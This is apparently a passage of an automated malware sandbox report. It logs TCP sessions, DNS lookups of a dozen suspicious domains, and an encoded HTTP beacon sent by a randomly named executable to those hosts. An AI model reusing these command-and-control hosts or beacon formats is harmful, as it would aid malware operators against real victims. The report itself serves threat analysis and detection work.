                                                                                                                            Dec 3, 2024 14:40:59.881216049 CET5004980192.168.2.6172.104.18.233
                                                                                                                            Dec 3, 2024 14:41:00.001303911 CET8050049172.104.18.233192.168.2.6
                                                                                                                            Dec 3, 2024 14:41:00.001403093 CET5004980192.168.2.6172.104.18.233
                                                                                                                            Dec 3, 2024 14:41:00.045715094 CET5004980192.168.2.6172.104.18.233
                                                                                                                            Dec 3, 2024 14:41:00.166124105 CET8050049172.104.18.233192.168.2.6
                                                                                                                            Dec 3, 2024 14:41:00.166204929 CET8050049172.104.18.233192.168.2.6
                                                                                                                            Dec 3, 2024 14:41:01.169348955 CET8050049172.104.18.233192.168.2.6
                                                                                                                            Dec 3, 2024 14:41:01.169373035 CET8050049172.104.18.233192.168.2.6
                                                                                                                            Dec 3, 2024 14:41:01.169543028 CET5004980192.168.2.6172.104.18.233
                                                                                                                            Dec 3, 2024 14:41:01.560434103 CET5004980192.168.2.6172.104.18.233
                                                                                                                            Dec 3, 2024 14:41:02.583662033 CET5005080192.168.2.6172.104.18.233
                                                                                                                            Dec 3, 2024 14:41:02.704215050 CET8050050172.104.18.233192.168.2.6
                                                                                                                            Dec 3, 2024 14:41:02.706536055 CET5005080192.168.2.6172.104.18.233
                                                                                                                            Dec 3, 2024 14:41:02.758177042 CET5005080192.168.2.6172.104.18.233
                                                                                                                            Dec 3, 2024 14:41:02.878212929 CET8050050172.104.18.233192.168.2.6
                                                                                                                            Dec 3, 2024 14:41:03.844734907 CET8050050172.104.18.233192.168.2.6
                                                                                                                            Dec 3, 2024 14:41:03.844963074 CET8050050172.104.18.233192.168.2.6
                                                                                                                            Dec 3, 2024 14:41:03.845046043 CET5005080192.168.2.6172.104.18.233
                                                                                                                            Dec 3, 2024 14:41:03.848642111 CET5005080192.168.2.6172.104.18.233
                                                                                                                            Dec 3, 2024 14:41:03.968625069 CET8050050172.104.18.233192.168.2.6
                                                                                                                            Dec 3, 2024 14:41:09.839971066 CET5005280192.168.2.6173.236.199.97
                                                                                                                            Dec 3, 2024 14:41:09.960427046 CET8050052173.236.199.97192.168.2.6
                                                                                                                            Dec 3, 2024 14:41:09.960540056 CET5005280192.168.2.6173.236.199.97
                                                                                                                            Dec 3, 2024 14:41:09.982424974 CET5005280192.168.2.6173.236.199.97
                                                                                                                            Dec 3, 2024 14:41:10.103045940 CET8050052173.236.199.97192.168.2.6
                                                                                                                            Dec 3, 2024 14:41:11.114233971 CET8050052173.236.199.97192.168.2.6
                                                                                                                            Dec 3, 2024 14:41:11.114726067 CET8050052173.236.199.97192.168.2.6
                                                                                                                            Dec 3, 2024 14:41:11.120114088 CET5005280192.168.2.6173.236.199.97
                                                                                                                            Dec 3, 2024 14:41:11.497653008 CET5005280192.168.2.6173.236.199.97
                                                                                                                            Dec 3, 2024 14:41:12.516787052 CET5005380192.168.2.6173.236.199.97
                                                                                                                            Dec 3, 2024 14:41:12.636715889 CET8050053173.236.199.97192.168.2.6
                                                                                                                            Dec 3, 2024 14:41:12.636853933 CET5005380192.168.2.6173.236.199.97
                                                                                                                            Dec 3, 2024 14:41:12.654444933 CET5005380192.168.2.6173.236.199.97
                                                                                                                            Dec 3, 2024 14:41:12.775932074 CET8050053173.236.199.97192.168.2.6
                                                                                                                            Dec 3, 2024 14:41:13.841635942 CET8050053173.236.199.97192.168.2.6
                                                                                                                            Dec 3, 2024 14:41:13.842222929 CET8050053173.236.199.97192.168.2.6
                                                                                                                            Dec 3, 2024 14:41:13.842276096 CET5005380192.168.2.6173.236.199.97
                                                                                                                            Dec 3, 2024 14:41:14.170097113 CET5005380192.168.2.6173.236.199.97
                                                                                                                            Dec 3, 2024 14:41:15.188802004 CET5005480192.168.2.6173.236.199.97
                                                                                                                            Dec 3, 2024 14:41:15.308926105 CET8050054173.236.199.97192.168.2.6
                                                                                                                            Dec 3, 2024 14:41:15.309154034 CET5005480192.168.2.6173.236.199.97
                                                                                                                            Dec 3, 2024 14:41:15.328624010 CET5005480192.168.2.6173.236.199.97
                                                                                                                            Dec 3, 2024 14:41:15.448699951 CET8050054173.236.199.97192.168.2.6
                                                                                                                            Dec 3, 2024 14:41:15.448734999 CET8050054173.236.199.97192.168.2.6
                                                                                                                            Dec 3, 2024 14:41:16.415549994 CET8050054173.236.199.97192.168.2.6
                                                                                                                            Dec 3, 2024 14:41:16.416156054 CET8050054173.236.199.97192.168.2.6
                                                                                                                            Dec 3, 2024 14:41:16.416218042 CET5005480192.168.2.6173.236.199.97
                                                                                                                            Dec 3, 2024 14:41:16.846425056 CET5005480192.168.2.6173.236.199.97
                                                                                                                            Dec 3, 2024 14:41:17.861747026 CET5005580192.168.2.6173.236.199.97
                                                                                                                            Dec 3, 2024 14:41:17.981857061 CET8050055173.236.199.97192.168.2.6
                                                                                                                            Dec 3, 2024 14:41:17.981977940 CET5005580192.168.2.6173.236.199.97
                                                                                                                            Dec 3, 2024 14:41:17.994131088 CET5005580192.168.2.6173.236.199.97
                                                                                                                            Dec 3, 2024 14:41:18.114092112 CET8050055173.236.199.97192.168.2.6
                                                                                                                            Dec 3, 2024 14:41:19.131710052 CET8050055173.236.199.97192.168.2.6
                                                                                                                            Dec 3, 2024 14:41:19.132531881 CET8050055173.236.199.97192.168.2.6
                                                                                                                            Dec 3, 2024 14:41:19.134439945 CET5005580192.168.2.6173.236.199.97
                                                                                                                            Dec 3, 2024 14:41:19.137135983 CET5005580192.168.2.6173.236.199.97
                                                                                                                            Dec 3, 2024 14:41:19.257149935 CET8050055173.236.199.97192.168.2.6
                                                                                                                            Dec 3, 2024 14:41:25.247832060 CET5005680192.168.2.685.159.66.93
                                                                                                                            Dec 3, 2024 14:41:25.368007898 CET805005685.159.66.93192.168.2.6
                                                                                                                            Dec 3, 2024 14:41:25.370630026 CET5005680192.168.2.685.159.66.93
                                                                                                                            Dec 3, 2024 14:41:25.386986017 CET5005680192.168.2.685.159.66.93
                                                                                                                            Dec 3, 2024 14:41:25.507224083 CET805005685.159.66.93192.168.2.6
                                                                                                                            Dec 3, 2024 14:41:26.888257027 CET5005680192.168.2.685.159.66.93
                                                                                                                            Dec 3, 2024 14:41:27.008780956 CET805005685.159.66.93192.168.2.6
                                                                                                                            Dec 3, 2024 14:41:27.010514975 CET5005680192.168.2.685.159.66.93
                                                                                                                            Dec 3, 2024 14:41:27.908107042 CET5005780192.168.2.685.159.66.93
                                                                                                                            Dec 3, 2024 14:41:28.028177977 CET805005785.159.66.93192.168.2.6
                                                                                                                            Dec 3, 2024 14:41:28.028265953 CET5005780192.168.2.685.159.66.93
                                                                                                                            Dec 3, 2024 14:41:28.051297903 CET5005780192.168.2.685.159.66.93
                                                                                                                            Dec 3, 2024 14:41:28.171328068 CET805005785.159.66.93192.168.2.6
                                                                                                                            Dec 3, 2024 14:41:29.560132027 CET5005780192.168.2.685.159.66.93
                                                                                                                            Dec 3, 2024 14:41:29.680865049 CET805005785.159.66.93192.168.2.6
                                                                                                                            Dec 3, 2024 14:41:29.680922985 CET5005780192.168.2.685.159.66.93
                                                                                                                            Dec 3, 2024 14:41:30.579654932 CET5005880192.168.2.685.159.66.93
                                                                                                                            Dec 3, 2024 14:41:30.699685097 CET805005885.159.66.93192.168.2.6
                                                                                                                            Dec 3, 2024 14:41:30.702567101 CET5005880192.168.2.685.159.66.93
                                                                                                                            Dec 3, 2024 14:41:30.717328072 CET5005880192.168.2.685.159.66.93
                                                                                                                            Dec 3, 2024 14:41:30.837332964 CET805005885.159.66.93192.168.2.6
                                                                                                                            Dec 3, 2024 14:41:30.837415934 CET805005885.159.66.93192.168.2.6
                                                                                                                            Dec 3, 2024 14:41:32.232129097 CET5005880192.168.2.685.159.66.93
                                                                                                                            Dec 3, 2024 14:41:32.352567911 CET805005885.159.66.93192.168.2.6
                                                                                                                            Dec 3, 2024 14:41:32.352689028 CET5005880192.168.2.685.159.66.93
                                                                                                                            Dec 3, 2024 14:41:33.254498005 CET5005980192.168.2.685.159.66.93
                                                                                                                            Dec 3, 2024 14:41:33.374494076 CET805005985.159.66.93192.168.2.6
                                                                                                                            Dec 3, 2024 14:41:33.374718904 CET5005980192.168.2.685.159.66.93
                                                                                                                            Dec 3, 2024 14:41:33.384145021 CET5005980192.168.2.685.159.66.93
                                                                                                                            Dec 3, 2024 14:41:33.504060030 CET805005985.159.66.93192.168.2.6
                                                                                                                            Dec 3, 2024 14:41:34.704046011 CET805005985.159.66.93192.168.2.6
                                                                                                                            Dec 3, 2024 14:41:34.704283953 CET805005985.159.66.93192.168.2.6
                                                                                                                            Dec 3, 2024 14:41:34.704363108 CET5005980192.168.2.685.159.66.93
                                                                                                                            Dec 3, 2024 14:41:34.707351923 CET5005980192.168.2.685.159.66.93
                                                                                                                            Dec 3, 2024 14:41:34.827198982 CET805005985.159.66.93192.168.2.6
                                                                                                                            Dec 3, 2024 14:41:49.369211912 CET5006080192.168.2.6154.70.82.246
                                                                                                                            Dec 3, 2024 14:41:49.489269972 CET8050060154.70.82.246192.168.2.6
                                                                                                                            Dec 3, 2024 14:41:49.492721081 CET5006080192.168.2.6154.70.82.246
                                                                                                                            Dec 3, 2024 14:41:49.508117914 CET5006080192.168.2.6154.70.82.246
                                                                                                                            Dec 3, 2024 14:41:49.628123045 CET8050060154.70.82.246192.168.2.6
                                                                                                                            Dec 3, 2024 14:41:51.013348103 CET5006080192.168.2.6154.70.82.246
                                                                                                                            Dec 3, 2024 14:41:51.134171009 CET8050060154.70.82.246192.168.2.6
                                                                                                                            Dec 3, 2024 14:41:51.134669065 CET5006080192.168.2.6154.70.82.246
                                                                                                                            Dec 3, 2024 14:41:52.894526005 CET5006180192.168.2.6154.70.82.246
                                                                                                                            Dec 3, 2024 14:41:53.014544010 CET8050061154.70.82.246192.168.2.6
                                                                                                                            Dec 3, 2024 14:41:53.014739037 CET5006180192.168.2.6154.70.82.246
                                                                                                                            Dec 3, 2024 14:41:53.030522108 CET5006180192.168.2.6154.70.82.246
                                                                                                                            Dec 3, 2024 14:41:53.150527954 CET8050061154.70.82.246192.168.2.6
                                                                                                                            Dec 3, 2024 14:41:55.487888098 CET8050061154.70.82.246192.168.2.6
                                                                                                                            Dec 3, 2024 14:41:55.487917900 CET8050061154.70.82.246192.168.2.6
                                                                                                                            Dec 3, 2024 14:41:55.487931013 CET8050061154.70.82.246192.168.2.6
                                                                                                                            Dec 3, 2024 14:41:55.487977982 CET5006180192.168.2.6154.70.82.246
                                                                                                                            Dec 3, 2024 14:41:55.488054991 CET8050061154.70.82.246192.168.2.6
                                                                                                                            Dec 3, 2024 14:41:55.488106966 CET5006180192.168.2.6154.70.82.246
                                                                                                                            Dec 3, 2024 14:41:55.488126040 CET8050061154.70.82.246192.168.2.6
                                                                                                                            Dec 3, 2024 14:41:55.488140106 CET8050061154.70.82.246192.168.2.6
                                                                                                                            Dec 3, 2024 14:41:55.488152981 CET8050061154.70.82.246192.168.2.6
                                                                                                                            Dec 3, 2024 14:41:55.488167048 CET8050061154.70.82.246192.168.2.6
                                                                                                                            Dec 3, 2024 14:41:55.488179922 CET5006180192.168.2.6154.70.82.246
                                                                                                                            Dec 3, 2024 14:41:55.488210917 CET5006180192.168.2.6154.70.82.246
                                                                                                                            Dec 3, 2024 14:41:55.488666058 CET8050061154.70.82.246192.168.2.6
                                                                                                                            Dec 3, 2024 14:41:55.488682032 CET8050061154.70.82.246192.168.2.6
                                                                                                                            Dec 3, 2024 14:41:55.488720894 CET5006180192.168.2.6154.70.82.246
                                                                                                                            Dec 3, 2024 14:41:55.608159065 CET8050061154.70.82.246192.168.2.6
                                                                                                                            Dec 3, 2024 14:41:55.608211994 CET8050061154.70.82.246192.168.2.6
                                                                                                                            Dec 3, 2024 14:41:55.610586882 CET5006180192.168.2.6154.70.82.246
                                                                                                                            Dec 3, 2024 14:41:55.612346888 CET8050061154.70.82.246192.168.2.6
                                                                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                                                                            Dec 3, 2024 14:38:30.227534056 CET5429453192.168.2.61.1.1.1
                                                                                                                            Dec 3, 2024 14:38:31.240906000 CET5429453192.168.2.61.1.1.1
                                                                                                                            Dec 3, 2024 14:38:31.316488981 CET53542941.1.1.1192.168.2.6
                                                                                                                            Dec 3, 2024 14:38:31.379713058 CET53542941.1.1.1192.168.2.6
                                                                                                                            Dec 3, 2024 14:38:47.666419029 CET5355453192.168.2.61.1.1.1
                                                                                                                            Dec 3, 2024 14:38:48.307755947 CET53535541.1.1.1192.168.2.6
                                                                                                                            Dec 3, 2024 14:39:03.439388990 CET6182553192.168.2.61.1.1.1
                                                                                                                            Dec 3, 2024 14:39:03.914633036 CET53618251.1.1.1192.168.2.6
                                                                                                                            Dec 3, 2024 14:39:18.548242092 CET5180753192.168.2.61.1.1.1
                                                                                                                            Dec 3, 2024 14:39:19.218504906 CET53518071.1.1.1192.168.2.6
                                                                                                                            Dec 3, 2024 14:39:33.767343044 CET6256153192.168.2.61.1.1.1
                                                                                                                            Dec 3, 2024 14:39:34.315836906 CET53625611.1.1.1192.168.2.6
                                                                                                                            Dec 3, 2024 14:39:48.924246073 CET5256753192.168.2.61.1.1.1
                                                                                                                            Dec 3, 2024 14:39:49.775722980 CET53525671.1.1.1192.168.2.6
                                                                                                                            Dec 3, 2024 14:40:04.206912994 CET5840053192.168.2.61.1.1.1
                                                                                                                            Dec 3, 2024 14:40:05.200745106 CET5840053192.168.2.61.1.1.1
                                                                                                                            Dec 3, 2024 14:40:06.216927052 CET5840053192.168.2.61.1.1.1
                                                                                                                            Dec 3, 2024 14:40:07.902249098 CET53584001.1.1.1192.168.2.6
                                                                                                                            Dec 3, 2024 14:40:07.902288914 CET53584001.1.1.1192.168.2.6
                                                                                                                            Dec 3, 2024 14:40:07.902343988 CET53584001.1.1.1192.168.2.6
                                                                                                                            Dec 3, 2024 14:40:22.534285069 CET5800653192.168.2.61.1.1.1
                                                                                                                            Dec 3, 2024 14:40:23.182395935 CET53580061.1.1.1192.168.2.6
                                                                                                                            Dec 3, 2024 14:40:38.504736900 CET5779453192.168.2.61.1.1.1
                                                                                                                            Dec 3, 2024 14:40:39.004745960 CET53577941.1.1.1192.168.2.6
                                                                                                                            Dec 3, 2024 14:40:53.784972906 CET5877553192.168.2.61.1.1.1
                                                                                                                            Dec 3, 2024 14:40:54.463169098 CET53587751.1.1.1192.168.2.6
                                                                                                                            Dec 3, 2024 14:41:08.861660957 CET6061353192.168.2.61.1.1.1
                                                                                                                            Dec 3, 2024 14:41:09.836792946 CET53606131.1.1.1192.168.2.6
                                                                                                                            Dec 3, 2024 14:41:24.143215895 CET5703953192.168.2.61.1.1.1
                                                                                                                            Dec 3, 2024 14:41:25.140505075 CET5703953192.168.2.61.1.1.1
                                                                                                                            Dec 3, 2024 14:41:25.244741917 CET53570391.1.1.1192.168.2.6
                                                                                                                            Dec 3, 2024 14:41:25.283742905 CET53570391.1.1.1192.168.2.6
                                                                                                                            Dec 3, 2024 14:41:39.721992016 CET5980553192.168.2.61.1.1.1
                                                                                                                            Dec 3, 2024 14:41:40.716552973 CET5980553192.168.2.61.1.1.1
                                                                                                                            Dec 3, 2024 14:41:40.838885069 CET53598051.1.1.1192.168.2.6
                                                                                                                            Dec 3, 2024 14:41:40.854104042 CET53598051.1.1.1192.168.2.6
                                                                                                                            Dec 3, 2024 14:41:43.890162945 CET6438153192.168.2.61.1.1.1
                                                                                                                            Dec 3, 2024 14:41:44.028763056 CET53643811.1.1.1192.168.2.6
                                                                                                                            Dec 3, 2024 14:41:49.049717903 CET5498853192.168.2.61.1.1.1
                                                                                                                            Dec 3, 2024 14:41:49.364649057 CET53549881.1.1.1192.168.2.6
                                                                                                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                            Dec 3, 2024 14:38:30.227534056 CET192.168.2.61.1.1.10x9c5aStandard query (0)www.aiactor.xyzA (IP address)IN (0x0001)false
                                                                                                                            Dec 3, 2024 14:38:31.240906000 CET192.168.2.61.1.1.10x9c5aStandard query (0)www.aiactor.xyzA (IP address)IN (0x0001)false
                                                                                                                            Dec 3, 2024 14:38:47.666419029 CET192.168.2.61.1.1.10xb22Standard query (0)www.jijievo.siteA (IP address)IN (0x0001)false
                                                                                                                            Dec 3, 2024 14:39:03.439388990 CET192.168.2.61.1.1.10x762cStandard query (0)www.inspireto.lifeA (IP address)IN (0x0001)false
                                                                                                                            Dec 3, 2024 14:39:18.548242092 CET192.168.2.61.1.1.10xb088Standard query (0)www.717hy.netA (IP address)IN (0x0001)false
                                                                                                                            Dec 3, 2024 14:39:33.767343044 CET192.168.2.61.1.1.10x967dStandard query (0)www.bootleggersrt.onlineA (IP address)IN (0x0001)false
                                                                                                                            Dec 3, 2024 14:39:48.924246073 CET192.168.2.61.1.1.10x66a4Standard query (0)www.lgdiamonds.infoA (IP address)IN (0x0001)false
                                                                                                                            Dec 3, 2024 14:40:04.206912994 CET192.168.2.61.1.1.10xd41bStandard query (0)www.funnystory.onlineA (IP address)IN (0x0001)false
                                                                                                                            Dec 3, 2024 14:40:05.200745106 CET192.168.2.61.1.1.10xd41bStandard query (0)www.funnystory.onlineA (IP address)IN (0x0001)false
                                                                                                                            Dec 3, 2024 14:40:06.216927052 CET192.168.2.61.1.1.10xd41bStandard query (0)www.funnystory.onlineA (IP address)IN (0x0001)false
                                                                                                                            Dec 3, 2024 14:40:22.534285069 CET192.168.2.61.1.1.10x7c43Standard query (0)www.614genetics.onlineA (IP address)IN (0x0001)false
                                                                                                                            Dec 3, 2024 14:40:38.504736900 CET192.168.2.61.1.1.10xd7ebStandard query (0)www.hm35s.topA (IP address)IN (0x0001)false
                                                                                                                            Dec 3, 2024 14:40:53.784972906 CET192.168.2.61.1.1.10x16ccStandard query (0)www.gravendeel.studioA (IP address)IN (0x0001)false
                                                                                                                            Dec 3, 2024 14:41:08.861660957 CET192.168.2.61.1.1.10xdfe4Standard query (0)www.kvsj.netA (IP address)IN (0x0001)false
                                                                                                                            Dec 3, 2024 14:41:24.143215895 CET192.168.2.61.1.1.10x9135Standard query (0)www.beythome.onlineA (IP address)IN (0x0001)false
                                                                                                                            Dec 3, 2024 14:41:25.140505075 CET192.168.2.61.1.1.10x9135Standard query (0)www.beythome.onlineA (IP address)IN (0x0001)false
                                                                                                                            Dec 3, 2024 14:41:39.721992016 CET192.168.2.61.1.1.10x2803Standard query (0)www.theressome123ppl.infoA (IP address)IN (0x0001)false
                                                                                                                            Dec 3, 2024 14:41:40.716552973 CET192.168.2.61.1.1.10x2803Standard query (0)www.theressome123ppl.infoA (IP address)IN (0x0001)false
                                                                                                                            Dec 3, 2024 14:41:43.890162945 CET192.168.2.61.1.1.10xcd5Standard query (0)www.theressome123ppl.infoA (IP address)IN (0x0001)false
                                                                                                                            Dec 3, 2024 14:41:49.049717903 CET192.168.2.61.1.1.10x528eStandard query (0)www.conseilnsaftogo.orgA (IP address)IN (0x0001)false
                                                                                                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                            Dec 3, 2024 14:38:31.316488981 CET1.1.1.1192.168.2.60x9c5aNo error (0)www.aiactor.xyz13.248.169.48A (IP address)IN (0x0001)false
                                                                                                                            Dec 3, 2024 14:38:31.316488981 CET1.1.1.1192.168.2.60x9c5aNo error (0)www.aiactor.xyz76.223.54.146A (IP address)IN (0x0001)false
                                                                                                                            Dec 3, 2024 14:38:31.379713058 CET1.1.1.1192.168.2.60x9c5aNo error (0)www.aiactor.xyz76.223.54.146A (IP address)IN (0x0001)false
                                                                                                                            Dec 3, 2024 14:38:31.379713058 CET1.1.1.1192.168.2.60x9c5aNo error (0)www.aiactor.xyz13.248.169.48A (IP address)IN (0x0001)false
                                                                                                                            Dec 3, 2024 14:38:48.307755947 CET1.1.1.1192.168.2.60xb22No error (0)www.jijievo.siteall.wjscdn.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                            Dec 3, 2024 14:38:48.307755947 CET1.1.1.1192.168.2.60xb22No error (0)all.wjscdn.com154.90.35.240A (IP address)IN (0x0001)false
                                                                                                                            Dec 3, 2024 14:38:48.307755947 CET1.1.1.1192.168.2.60xb22No error (0)all.wjscdn.com154.90.58.209A (IP address)IN (0x0001)false
                                                                                                                            Dec 3, 2024 14:38:48.307755947 CET1.1.1.1192.168.2.60xb22No error (0)all.wjscdn.com154.205.143.51A (IP address)IN (0x0001)false
                                                                                                                            Dec 3, 2024 14:38:48.307755947 CET1.1.1.1192.168.2.60xb22No error (0)all.wjscdn.com154.205.156.26A (IP address)IN (0x0001)false
                                                                                                                            Dec 3, 2024 14:38:48.307755947 CET1.1.1.1192.168.2.60xb22No error (0)all.wjscdn.com154.205.159.116A (IP address)IN (0x0001)false
                                                                                                                            Dec 3, 2024 14:38:48.307755947 CET1.1.1.1192.168.2.60xb22No error (0)all.wjscdn.com38.54.112.227A (IP address)IN (0x0001)false
                                                                                                                            Dec 3, 2024 14:39:03.914633036 CET1.1.1.1192.168.2.60x762cNo error (0)www.inspireto.life162.0.213.94A (IP address)IN (0x0001)false
                                                                                                                            Dec 3, 2024 14:39:19.218504906 CET1.1.1.1192.168.2.60xb088No error (0)www.717hy.net68.66.226.92A (IP address)IN (0x0001)false
                                                                                                                            Dec 3, 2024 14:39:34.315836906 CET1.1.1.1192.168.2.60x967dNo error (0)www.bootleggersrt.online31.31.196.17A (IP address)IN (0x0001)false
                                                                                                                            Dec 3, 2024 14:39:49.775722980 CET1.1.1.1192.168.2.60x66a4No error (0)www.lgdiamonds.info130.185.109.77A (IP address)IN (0x0001)false
                                                                                                                            Dec 3, 2024 14:40:07.902249098 CET1.1.1.1192.168.2.60xd41bNo error (0)www.funnystory.onlinefunnystory.onlineCNAME (Canonical name)IN (0x0001)false
                                                                                                                            Dec 3, 2024 14:40:07.902249098 CET1.1.1.1192.168.2.60xd41bNo error (0)funnystory.online172.104.82.74A (IP address)IN (0x0001)false
                                                                                                                            Dec 3, 2024 14:40:07.902288914 CET1.1.1.1192.168.2.60xd41bNo error (0)www.funnystory.onlinefunnystory.onlineCNAME (Canonical name)IN (0x0001)false
                                                                                                                            Dec 3, 2024 14:40:07.902288914 CET1.1.1.1192.168.2.60xd41bNo error (0)funnystory.online172.104.82.74A (IP address)IN (0x0001)false
                                                                                                                            Dec 3, 2024 14:40:07.902343988 CET1.1.1.1192.168.2.60xd41bNo error (0)www.funnystory.onlinefunnystory.onlineCNAME (Canonical name)IN (0x0001)false
                                                                                                                            Dec 3, 2024 14:40:07.902343988 CET1.1.1.1192.168.2.60xd41bNo error (0)funnystory.online172.104.82.74A (IP address)IN (0x0001)false
                                                                                                                            Dec 3, 2024 14:40:23.182395935 CET1.1.1.1192.168.2.60x7c43No error (0)www.614genetics.online208.91.197.27A (IP address)IN (0x0001)false
                                                                                                                            Dec 3, 2024 14:40:39.004745960 CET1.1.1.1192.168.2.60xd7ebNo error (0)www.hm35s.tophm35s.topCNAME (Canonical name)IN (0x0001)false
                                                                                                                            Dec 3, 2024 14:40:39.004745960 CET1.1.1.1192.168.2.60xd7ebNo error (0)hm35s.top154.23.184.95A (IP address)IN (0x0001)false
                                                                                                                            Dec 3, 2024 14:40:54.463169098 CET1.1.1.1192.168.2.60x16ccNo error (0)www.gravendeel.studiogravendeel.studioCNAME (Canonical name)IN (0x0001)false
                                                                                                                            Dec 3, 2024 14:40:54.463169098 CET1.1.1.1192.168.2.60x16ccNo error (0)gravendeel.studio172.104.18.233A (IP address)IN (0x0001)false
                                                                                                                            Dec 3, 2024 14:41:09.836792946 CET1.1.1.1192.168.2.60xdfe4No error (0)www.kvsj.net173.236.199.97A (IP address)IN (0x0001)false
                                                                                                                            Dec 3, 2024 14:41:25.244741917 CET1.1.1.1192.168.2.60x9135No error (0)www.beythome.onlineredirect.natrocdn.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                            Dec 3, 2024 14:41:25.244741917 CET1.1.1.1192.168.2.60x9135No error (0)redirect.natrocdn.comnatroredirect.natrocdn.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                            Dec 3, 2024 14:41:25.244741917 CET1.1.1.1192.168.2.60x9135No error (0)natroredirect.natrocdn.com85.159.66.93A (IP address)IN (0x0001)false
                                                                                                                            Dec 3, 2024 14:41:25.283742905 CET1.1.1.1192.168.2.60x9135No error (0)www.beythome.onlineredirect.natrocdn.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                            Dec 3, 2024 14:41:25.283742905 CET1.1.1.1192.168.2.60x9135No error (0)redirect.natrocdn.comnatroredirect.natrocdn.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                            Dec 3, 2024 14:41:25.283742905 CET1.1.1.1192.168.2.60x9135No error (0)natroredirect.natrocdn.com85.159.66.93A (IP address)IN (0x0001)false
                                                                                                                            Dec 3, 2024 14:41:40.838885069 CET1.1.1.1192.168.2.60x2803Name error (3)www.theressome123ppl.infononenoneA (IP address)IN (0x0001)false
                                                                                                                            Dec 3, 2024 14:41:40.854104042 CET1.1.1.1192.168.2.60x2803Name error (3)www.theressome123ppl.infononenoneA (IP address)IN (0x0001)false
                                                                                                                            Dec 3, 2024 14:41:44.028763056 CET1.1.1.1192.168.2.60xcd5Name error (3)www.theressome123ppl.infononenoneA (IP address)IN (0x0001)false
                                                                                                                            Dec 3, 2024 14:41:49.364649057 CET1.1.1.1192.168.2.60x528eNo error (0)www.conseilnsaftogo.orgconseilnsaftogo.orgCNAME (Canonical name)IN (0x0001)false
                                                                                                                            Dec 3, 2024 14:41:49.364649057 CET1.1.1.1192.168.2.60x528eNo error (0)conseilnsaftogo.org154.70.82.246A (IP address)IN (0x0001)false
                                                                                                                            • www.aiactor.xyz
                                                                                                                            • www.jijievo.site
                                                                                                                            • www.inspireto.life
                                                                                                                            • www.717hy.net
                                                                                                                            • www.bootleggersrt.online
                                                                                                                            • www.lgdiamonds.info
                                                                                                                            • www.funnystory.online
                                                                                                                            • www.614genetics.online
                                                                                                                            • www.hm35s.top
                                                                                                                            • www.gravendeel.studio
                                                                                                                            • www.kvsj.net
                                                                                                                            • www.beythome.online
                                                                                                                            • www.conseilnsaftogo.org
                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            0192.168.2.64983013.248.169.48805868C:\Program Files (x86)\jxvBoUoRVImTlYTBniSBFOGvGdJGecWXoXjUJTHdYuHBHGyZlaKpIgYeTZDrsAOiz\XVZmwHdSYwx.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            Dec 3, 2024 14:38:31.478219032 CET551OUTGET /ni8v/?u6nP_F48=E6dmM5lVsU5dMvoO4DByNQl1po9CAiKqwP/M9Lkf/Pz1vXYNvQEcepUiklJu8ucCjCBb2PxhMpGrlWRQjEXW3F39dXh33B934veeKulAqM3yo8/KKg/OIuvEV/M85G2BQAfVVnY=&F8S0G=ul80rPhxFlR8lH HTTP/1.1
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                            Accept-Language: en-US,en;q=0.5
                                                                                                                            Host: www.aiactor.xyz
                                                                                                                            Connection: close
                                                                                                                            User-Agent: Mozilla/5.0 (Linux; U; Android 4.2.2; en-us; GT-N7100 Build/JDQ39) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                                                                            Dec 3, 2024 14:38:32.568223953 CET421INHTTP/1.1 200 OK
                                                                                                                            Server: openresty
                                                                                                                            Date: Tue, 03 Dec 2024 13:38:32 GMT
                                                                                                                            Content-Type: text/html
                                                                                                                            Content-Length: 281
                                                                                                                            Connection: close
                                                                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 75 36 6e 50 5f 46 34 38 3d 45 36 64 6d 4d 35 6c 56 73 55 35 64 4d 76 6f 4f 34 44 42 79 4e 51 6c 31 70 6f 39 43 41 69 4b 71 77 50 2f 4d 39 4c 6b 66 2f 50 7a 31 76 58 59 4e 76 51 45 63 65 70 55 69 6b 6c 4a 75 38 75 63 43 6a 43 42 62 32 50 78 68 4d 70 47 72 6c 57 52 51 6a 45 58 57 33 46 33 39 64 58 68 33 33 42 39 33 34 76 65 65 4b 75 6c 41 71 4d 33 79 6f 38 2f 4b 4b 67 2f 4f 49 75 76 45 56 2f 4d 38 35 47 32 42 51 41 66 56 56 6e 59 3d 26 46 38 53 30 47 3d 75 6c 38 30 72 50 68 78 46 6c 52 38 6c 48 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                                                                                            Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?u6nP_F48=E6dmM5lVsU5dMvoO4DByNQl1po9CAiKqwP/M9Lkf/Pz1vXYNvQEcepUiklJu8ucCjCBb2PxhMpGrlWRQjEXW3F39dXh33B934veeKulAqM3yo8/KKg/OIuvEV/M85G2BQAfVVnY=&F8S0G=ul80rPhxFlR8lH"}</script></head></html>


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            1192.168.2.649870154.90.35.240805868C:\Program Files (x86)\jxvBoUoRVImTlYTBniSBFOGvGdJGecWXoXjUJTHdYuHBHGyZlaKpIgYeTZDrsAOiz\XVZmwHdSYwx.exe
                                                                                                                            TimestampBytes transferredDirectionData
